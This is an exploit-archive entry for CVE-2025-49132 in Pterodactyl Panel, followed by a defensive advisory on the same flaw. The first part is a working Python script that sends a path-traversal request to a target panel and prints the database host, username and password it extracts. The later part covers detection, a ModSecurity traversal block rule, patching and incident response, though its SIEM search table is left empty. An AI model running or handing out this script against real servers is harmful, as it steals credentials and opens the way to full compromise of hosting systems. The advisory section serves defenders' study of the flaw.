Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)
# Exploit Title: Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)
# Date: 22/06/2025
# Exploit Author: Zen-kun04
# Vendor Homepage: https://pterodactyl.io/
# Software Link: https://github.com/pterodactyl/panel
# Version: < 1.11.11
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-49132
import requests
import json
import argparse
import colorama
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
arg_parser = argparse.ArgumentParser(
description="Check if the target is vulnerable to CVE-2025-49132.")
arg_parser.add_argument("target", help="The target URL")
args = arg_parser.parse_args()
try:
target = args.target.strip() + '/' if not args.target.strip().endswith('/') else args.target.strip()
r = requests.get(f"{target}locales/locale.json?locale=../../../pterodactyl&namespace=config/database", allow_redirects=True, timeout=5, verify=False)
if r.status_code == 200 and "pterodactyl" in r.text.lower():
try:
raw_data = r.json()
data = {
"success": True,
"host": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("host", "N/A"),
"port": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("port", "N/A"),
"database": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("database", "N/A"),
"username": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("username", "N/A"),
"password": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("password", "N/A")
}
print(f"{colorama.Fore.LIGHTGREEN_EX}{target} => {data['username']}:{data['password']}@{data['host']}:{data['port']}/{data['database']}{colorama.Fore.RESET}")
except json.JSONDecodeError:
print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
except TypeError:
print(colorama.Fore.YELLOW + "Vulnerable but no database" + colorama.Fore.RESET)
else:
print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
except requests.RequestException as e:
if "NameResolutionError" in str(e):
print(colorama.Fore.RED + "Invalid target or unable to resolve domain" + colorama.Fore.RESET)
else:
print(f"{colorama.Fore.RED}Request error: {e}{colorama.Fore.RESET}")Pterodactyl Panel 1.11.11 — Remote Code Execution (CVE-2025-49132)
This article provides a security-focused, non-exploitative overview of the CVE-2025-49132 vulnerability affecting Pterodactyl Panel versions prior to 1.11.11. It explains the high-level technical root cause, potential impact, detection and mitigation strategies, recommended patching and configuration steps, and incident response guidance for defenders and administrators.
Summary
Pterodactyl Panel prior to 1.11.11 contains a vulnerability that can be abused to expose sensitive configuration material and, in some scenarios, lead to remote code execution (RCE). The vendor has published fixes in the 1.11.11 release. Administrators should treat this as a high-severity issue because it can expose database credentials and other secrets used by the panel and its worker nodes.
Key takeaways
- Affected versions: Pterodactyl Panel < 1.11.11
- CVE: CVE-2025-49132
- Primary impact: disclosure of secrets (DB credentials) and possible RCE depending on environment and chaining
- Immediate action: patch to 1.11.11 or later, rotate exposed credentials, and harden access controls
High-level technical description (non-actionable)
At a high level, the flaw is caused by inadequate input validation within a component that loads localization or configuration resources. This allows crafted requests to traverse application resource paths and retrieve configuration objects or files that are not intended to be publicly accessible. When an attacker can obtain credentials or configuration details (for example, database usernames and passwords), they may be able to further compromise the system (credential reuse, lateral movement, or remote code execution via chained vulnerabilities or misconfigurations).
Impact and risk
- Secret disclosure: Database connection strings, API keys, or other secrets stored in panel configuration files may be exposed.
- Privileged access: If database credentials are valid and privileged, an attacker could read or modify the application database, escalate privileges, or pivot to other systems.
- Remote code execution (RCE): In some environments, disclosed secrets or other configuration details can be used together with other weak controls to achieve RCE.
- Operational impact: Game servers and hosted services relying on the panel may be disrupted, and customer data or billing information could be exposed.
Detection and indicators of compromise (IoCs)
Below are defensive indicators and log patterns you can monitor. These are for detection, not exploitation.
- Unusual HTTP requests targeting localization or configuration endpoints (e.g., requests with "locales", "locale", or similar query parameters).
- Requests containing traversal patterns in query strings observed in access logs (e.g., sequences of "../" or percent-encoded variants), especially when targeting API or resource endpoints.
- Unexpected outbound database connections from panel hosts to unknown IPs.
- Application logs showing errors or JSON dumps containing configuration data served via endpoints.
Example log search rules (SIEM-friendly)
| Use case | Example search |
|---|---|
| Detect potential traversal attempts | |
| Detect JSON responses containing configuration keys | |
Explanation: These searches are intended to detect suspicious requests and responses. Tune them to reduce false positives (e.g., legitimate locale queries) and monitor for actual data leakage.
Immediate mitigation and containment
If you suspect compromise or want to proactively reduce risk, take the following steps.
- Patch immediately: Upgrade the panel to version 1.11.11 or later. This is the primary and recommended remediation.
- Restrict access: Limit panel access to management networks via firewall rules, VPNs, or IP allowlists while you assess and patch.
- Rotate secrets: If you find evidence of credential exposure (database credentials, API keys), rotate them immediately and update dependent services.
- Harden webserver: Ensure directories outside the public webroot are not served by the webserver and deny direct HTTP access to internal config or locale directories.
- Monitor & alert: Watch for unusual database access patterns, new user accounts, or changes to server binaries.
How to upgrade safely (recommended process)
Follow the vendor’s official upgrade path. The steps below are a general, defensive outline — adapt to your deployment model (package, Docker, manual git installation).
# Example high-level upgrade checklist (non-exploitative)
1. Backup: snapshot servers, backup panel database and config files.
2. Read release notes for 1.11.11 and later to understand breaking changes.
3. Put the panel into maintenance mode (if supported).
4. Perform the upgrade in a staging environment first. Test functionality.
5. Apply the patch to production during a maintenance window.
6. Verify services (panel, wings/daemon, workers) are healthy.
7. Rotate secrets if you suspect any exposure.
8. Remove maintenance mode and monitor logs closely.
Explanation: This checklist emphasizes safe change management — take backups, test in staging, and monitor after deploying fixes.
Web server and WAF mitigations (defensive rule examples)
As a short-term protective measure, you can add server rules or WAF policies that block requests with obvious directory traversal attempts in query parameters. These are defensive and reduce the attack surface while you patch. Example rules must be tuned to avoid blocking legitimate traffic.
# Example ModSecurity rule (conceptual, defensive)
SecRule REQUEST_URI|ARGS "@rx (\.\./|\%2e\%2e/)" \
"id:100001,phase:1,deny,status:403,msg:'Blocked potential directory traversal request',log"
Explanation: This ModSecurity rule blocks requests containing "../" or percent-encoded equivalents in URI or arguments. It's intended as a temporary mitigation; tune the regex and testing is required to avoid false positives.
Hardening and long-term recommendations
- Keep Pterodactyl and all dependencies (PHP, web server, OS packages) up to date and subscribe to vendor security announcements.
- Restrict the panel UI to administrator networks or use VPN/IP allowlists.
- Use strong, unique credentials for databases and service accounts; avoid using the same credentials across multiple services.
- Apply the principle of least privilege to database accounts — only grant required permissions.
- Use secrets management for credentials rather than storing plaintext config in web-accessible locations.
- Harden the host with OS-level controls: SELinux/AppArmor, up-to-date kernel, and process isolation for worker processes.
- Enable logging and centralized monitoring for anomalous behavior and set up alerting for high-risk indicators.
Incident response checklist
- Isolate affected systems from the network if active exploitation is detected.
- Preserve logs and disk images for forensic analysis.
- Identify and rotate any credentials that may have been exposed (DB, API keys, service accounts).
- Perform integrity checks on code, installed packages, and system binaries; look for unauthorized changes or backdoors.
- Rebuild compromised hosts from known-good images if persistence is suspected.
- Engage stakeholders and notify customers if sensitive data was exposed per legal/regulatory requirements.
References and resources
- Pterodactyl official site and release notes — follow vendor advisories for exact patch instructions.
- CVE-2025-49132 — use official CVE details and vendor-issued security bulletin for authoritative guidance.
- OWASP secure configuration guidance — general web-application hardening best practices.
Closing (practical summary)
If you operate Pterodactyl Panel, prioritize upgrading to the fixed release (1.11.11 or later), rotate any potentially exposed secrets, and apply short-term mitigations like network restrictions and WAF rules while you patch. Implement stronger access controls and continuous monitoring to reduce risk from similar issues in the future.